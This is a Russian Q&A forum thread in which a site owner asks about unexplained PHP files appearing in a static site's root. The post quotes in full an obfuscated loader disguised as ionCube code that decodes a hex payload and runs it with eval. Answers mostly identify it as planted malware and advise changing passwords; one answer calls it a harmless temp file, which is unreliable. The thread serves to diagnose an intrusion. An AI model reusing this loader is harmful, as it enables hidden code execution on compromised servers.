semenovstyle
@semenovstyle

Какое действие выполняет данный код?

Всем привет!
Не так давно на сервере в корне статичного сайта стали появляться файлы с расширением .php , например session98.php и т.д. Сайт работает без CMS.
Пример кода в файле
<?php //00037a
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xc24-0x774)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
2E46Vd73667A4203dO20417Z272617O92E82F7N787576M7W6P6Sa27F3RdX3AeK27787Ea67Z72
76C732I7Y293b2479P6J3Z6O467I78G72203Ad2041A7272L61H792827Z7A3707V77963762J7
H3d3e277365G6Q2A6O26Pa2V72M9H3b66S6f726H56V16368M202A8417M2D7W2W61792824C6d
7366742c20I24X5Zf504fH53542cA20247Z963K64677Q87F22c2K0H245f434EfJ4RfC4b4T94
O52N9206O173K20Z2B4647R9K6La7a636P6I2920V7bY6P66MfK726561M63L6C82I0L28O24F6
4E796aP7Oa63I662L06173V202478S71646c20M3dS3e20Y2W462G6ReQ7a64292T07XbI246H2
P6UeN7aX64V203Nd204Q0706Q1636bY2822T482aO22N2cR20W2R4N62L6e7aH6S4J2U9L3b24V
7H8E716X46c2Q0R2eU3UdV2D02264M303Y3X35G65T3931622Fd3W9C653V63V2M2d34Z613562
2HdP386X66M2302d656J2B383L5B363V33330V30C396561P22T3Sb24D6aM777M5K6b7W1203d
202G46E26e7a64A20B5e207375R62T7O374D722L8H7N3S747M25fV72Y6N57R0H6S5617J4Q2X
824787B16H4B6cP2Qc20287374726Sc6A56We282D4626He7a64A2F9C202f20S73A74J7E26Pc
656e2H8C2478X7T1646Sc2Y929202b20G31C29K2c2R0302cW2073747L26Pc656Ne282G4626e
7Ya64E2929U3b246a7775K6bZ71J2S03d206Y57M8O706c6OfT6465M282N22322V2c2A0B246a
7Z775F6bT71I293bP6966202P8C6I3B6f7B56e7428246a7X7I7P56Bb712V920Y3d3Id203S3T
292E07b65U7F6A6A16Qc28246a77756b715bT3L1J5d2M824D6aX77R756XbA71Z5Gb3X2K5Td2
G92Z9Q3b657J8Z69742W8T293MbZ7NdO7d7d

Подскажите, что это и откуда берется ? Раньше подобного не было.
  • Вопрос задан
  • 496 просмотров
Решения вопроса 3
@rodion11
php dev
Исходя из вопроса и содержимого, данный код очень похож на вредоносный.
Действительно, бывают файлы зашифрованные через кодировщик IonCube и они похожи на фрагмент из вопроса.
Однако, это скорее всего левак, т.к. ранее таких файлов не было и меня очень смущает наличие в коде
eval($__ln);
Ответ написан
@Eugeny1987
Работаю с HostCMS
Код зашифрован через ioncube, в данном случае он вредоносный

вероятно злоумышленником получен доступ к серверу\фтп, смените пароли на всякий случай
Ответ написан
Комментировать
Expany
@Expany
$this->get('skill');
Осмелюсь предположить, что приведенный код проверяет что за система стоит на сервере, после чего осуществляет поиск нужных библотек для работы.
Я так понимаю это не весь код.
Ответ написан
Пригласить эксперта
Ответы на вопрос 2
politon
@politon
HTML5,CSS3,JS,PHP,SQL,API,canvas,animation...
Зашифрован под Ion Cube.
Почитай, что это такое,прежде чем использовать чужой код ;)
Ответ написан
impyros
@impyros
Вы прям все идиоты или как этот файл упакован Ioncube, а в первой строчке идет проверка версии PHP и наличие установленного Ioncube Loader
название session98.php указывает что это TMP файл а в корне потому как не указана папка TMP
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы